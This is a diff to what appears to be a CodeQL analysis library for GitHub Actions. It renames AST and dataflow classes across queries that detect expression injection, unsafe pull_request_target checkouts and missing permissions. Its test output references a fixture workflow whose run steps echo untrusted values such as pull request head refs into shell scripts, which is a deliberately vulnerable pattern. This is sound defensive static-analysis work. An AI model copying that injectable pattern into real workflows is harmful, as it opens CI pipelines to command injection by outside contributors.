UsesExpr { } } -private class RunTree extends StandardPreOrderTree instanceof RunExpr { - //override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } +private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and l = child.getLocation() | @@ -294,4 +285,16 @@ private class RunTree extends StandardPreOrderTree instanceof RunExpr { } } -private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } +private class UsesLeaf extends LeafTree instanceof Uses { } + +private class InputExprTree extends LeafTree instanceof InputExpr { } + +private class OutputExprTree extends LeafTree instanceof OutputExpr { } + +private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } + +private class EnvExprTree extends LeafTree instanceof EnvExpr { } + +private class ExprAccessTree extends LeafTree instanceof ContextExpression { } + +private class AstNodeLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 594b6017729..479078fe18b 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -42,7 +42,7 @@ predicate sinkModel(string action, string version, string input, string kind) { predicate externallyDefinedSource( DataFlow::Node source, string sourceType, string fieldName, string trigger ) { - exists(UsesExpr uses, string action, string version, string kind | + exists(Uses uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( @@ -65,7 +65,7 @@ predicate externallyDefinedSource( predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { - exists(UsesExpr uses, string action, string version, string input, string output | + exists(Uses uses, string action, string version, string input, string output | summaryModel(action, version, input, output, "taint") and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and @@ -87,7 +87,7 @@ predicate externallyDefinedStoreStep( } predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { - exists(UsesExpr uses, string action, string version, string input | + exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0e82498bfc1..c30c963afdb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -114,7 +114,7 @@ private class EventSource extends RemoteFlowSource { string trigger; EventSource() { - exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | + exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) or trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and @@ -158,9 +158,9 @@ private class ExternallyDefinedSource extends RemoteFlowSource { * An input for a Composite Action */ private class CompositeActionInputSource extends RemoteFlowSource { - CompositeActionStmt c; + CompositeAction c; - CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } + CompositeActionInputSource() { c.getInputs().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index bc0c782e9ff..64df342ae9b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -34,7 +34,7 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(RunExpr r, string varName, string output | + exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b9aafb8ec94..62975959b39 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -54,21 +54,22 @@ DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { none() } class DataFlowExpr extends Cfg::Node { - DataFlowExpr() { this.getAstNode() instanceof Expression } + DataFlowExpr() { any() } + //DataFlowExpr() { this.getAstNode() instanceof Expression } } /** * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { - DataFlowCall() { super.getAstNode() instanceof UsesExpr } + DataFlowCall() { super.getAstNode() instanceof Uses } /** Gets a textual representation of this element. */ string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { result = super.getAstNode().(UsesExpr).getCallee() } + string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } } @@ -82,11 +83,11 @@ class DataFlowCallable instanceof Cfg::CfgScope { Location getLocation() { result = super.getLocation() } string getName() { - if this instanceof ReusableWorkflowStmt - then result = this.(ReusableWorkflowStmt).getLocation().getFile().getRelativePath() + if this instanceof ReusableWorkflow + then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() else - if this instanceof CompositeActionStmt - then result = this.(CompositeActionStmt).getLocation().getFile().getRelativePath() + if this instanceof CompositeAction + then result = this.(CompositeAction).getLocation().getFile().getRelativePath() else none() } } @@ -134,9 +135,9 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env, matrix or inputs - name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() or - name = any(JobsCtxAccessExpr a).getFieldName() + name = any(StepsExpression a).getFieldName() or + name = any(NeedsExpression a).getFieldName() or + name = any(JobsExpression a).getFieldName() } predicate forceHighPrecision(Content c) { c instanceof FieldContent } @@ -149,14 +150,14 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflow w).getInputs().getInputExpr(this)) } } /** * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(UsesExpr e).getArgumentExpr(this)) } + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } } /** @@ -172,11 +173,11 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | + exists(Uses astFrom, StepsExpression astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -189,11 +190,11 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { * field name. */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(UsesExpr astFrom, NeedsCtxAccessExpr astTo | + exists(Uses astFrom, NeedsExpression astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -202,10 +203,10 @@ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, InputsCtxAccessExpr astTo | + exists(AstNode astFrom, InputsExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -214,10 +215,10 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ matrix.foo }} */ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, MatrixCtxAccessExpr astTo | + exists(AstNode astFrom, MatrixExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -226,12 +227,12 @@ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvCtxAccessExpr astTo | + exists(Expression astFrom, EnvExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) ) } @@ -266,17 +267,17 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } /** - * Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { - exists(CtxAccessExpr access | + exists(ContextExpression access | ( - access instanceof NeedsCtxAccessExpr or - access instanceof StepsCtxAccessExpr or - access instanceof JobsCtxAccessExpr + access instanceof NeedsExpression or + access instanceof StepsExpression or + access instanceof JobsExpression ) and c = any(FieldContent ct | ct.getName() = access.getFieldName()) and - node1.asExpr() = access.getRefExpr() and + node1.asExpr() = access.getTarget() and node2.asExpr() = access ) } @@ -294,7 +295,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node * using the output variable name as the access path */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { - exists(OutputsStmt out, string fieldName | + exists(Outputs out, string fieldName | node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 5fe3c741735..a8434cdb603 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -52,11 +52,11 @@ class ParameterNode extends ExprNode { ParameterNode() { this.asExpr() = input and - input = any(InputsStmt s).getInputExpr(_) + input = any(Inputs s).getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) + input = c.(ReusableWorkflow).getInputs().getInputExpr(pos) } override string toString() { result = "input " + input.toString() } @@ -81,12 +81,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgumentExpr(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(UsesExpr e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } @@ -94,11 +94,11 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private OutputsStmt outputs; + private Outputs outputs; ReturnNode() { this.asExpr() = outputs and - outputs = any(ReusableWorkflowStmt s).getOutputsStmt() + outputs = any(ReusableWorkflow s).getOutputs() } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index c0a694455dc..fbdf9ca7daa 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql @@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "matrix.yml" + source.getLocation().getFile().getBaseName() = "argus_case_study.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 525307bcc28..5bff6abc7bb 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,14 +18,14 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index b3eb6d348a8..12703a6cff2 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -20,11 +20,11 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and not source instanceof DataFlow::ParameterNode and - exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) + exists(CompositeAction c | c.getAChildNode*() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index b451d9d1bda..e5933a73b36 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 9317b900158..1e1f942b200 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql @@ -18,14 +18,14 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index eeea688b273..7bcea3d45b0 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -20,11 +20,11 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and not source instanceof DataFlow::ParameterNode and - exists(ReusableWorkflowStmt w | w.getAChildNode*() = source.asExpr()) + exists(ReusableWorkflow w | w.getAChildNode*() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 3949488e129..5ac0c299929 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index a6baf060c9d..63f1a7a9d3a 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -40,8 +40,7 @@ where source .getNode() .asExpr() - .(Statement) - .getEnclosingWorkflowStmt() + .getEnclosingWorkflow() .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index c34fcb74bbc..b13bf88abe6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index a4cecf18b78..9373bf808e3 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -13,11 +13,11 @@ import actions -from WorkflowStmt workflow, JobStmt job +from Workflow workflow, Job job where - job = workflow.getAJobStmt() and + job = workflow.getAJob() and ( - not exists(workflow.getPermissionsStmt()) and - not exists(job.getPermissionsStmt()) + not exists(workflow.getPermissions()) and + not exists(job.getPermissions()) ) select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 3c951a4e0b0..34bcbd7b060 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -21,10 +21,10 @@ private predicate isTrustedOrg(string repo) { exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } -from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name +from StepUses uses, string repo, string version, Workflow workflow, string name where uses.getCallee() = repo and - uses.getEnclosingWorkflowStmt() = workflow and + uses.getEnclosingWorkflow() = workflow and ( workflow.getName() = name or diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 3c745b5d84a..ed96d5f07c1 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -18,34 +18,34 @@ import actions /** * An If node that contains an `actor` check */ -class ActorCheckStmt extends IfStmt { - ActorCheckStmt() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } +class ActorCheck extends If { + ActorCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } } /** * An If node that contains a `label` check */ -class LabelCheckStmt extends IfStmt { - LabelCheckStmt() { +class LabelCheck extends If { + LabelCheck() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") } } -from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep +from Workflow w, Job job, StepUses checkoutStep where w.hasTriggerEvent("pull_request_target") and - w.getAJobStmt() = job and - job.getAStepStmt() = checkoutStep and + w.getAJob() = job and + job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep .getArgumentExpr("ref") - .(ExprAccessExpr) + .(Expression) .getExpression() .matches([ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" ]) and - not exists(ActorCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) and - not exists(LabelCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) + not exists(ActorCheck check | job.getIf() = check or checkoutStep.getIf() = check) and + not exists(LabelCheck check | job.getIf() = check or checkoutStep.getIf() = check) select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4007e6454ea..ffbbed2bac1 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -90,18 +90,11 @@ stepUsesNodes | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | jobUsesNodes usesSteps -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | fetch-depth | .github/workflows/test.yml:13:24:13:24 | 0 | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | find | .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | replace | .github/workflows/test.yml:25:20:25:21 | "" | | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -runSteps1 +runSteps | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | -runSteps2 -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | runStepChildren | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | @@ -115,21 +108,6 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -varAccesses -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | -orphanVarAccesses -nonOrphanVarAccesses -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | .github/workflows/test.yml:39:9:40:53 | id: sink | parentNodes | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -200,6 +178,8 @@ parentNodes | .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | cfgNodes +dfNodes +exprNodes | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -218,44 +198,15 @@ cfgNodes | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | | .github/workflows/test.yml:39:9:40:53 | id: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -dfNodes -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -exprNodes -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | argumentNodes | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | usesIds | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | nodeLocations +| .github/workflows/test.yml:1:1:40:53 | enter on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:1:1:40:53 | 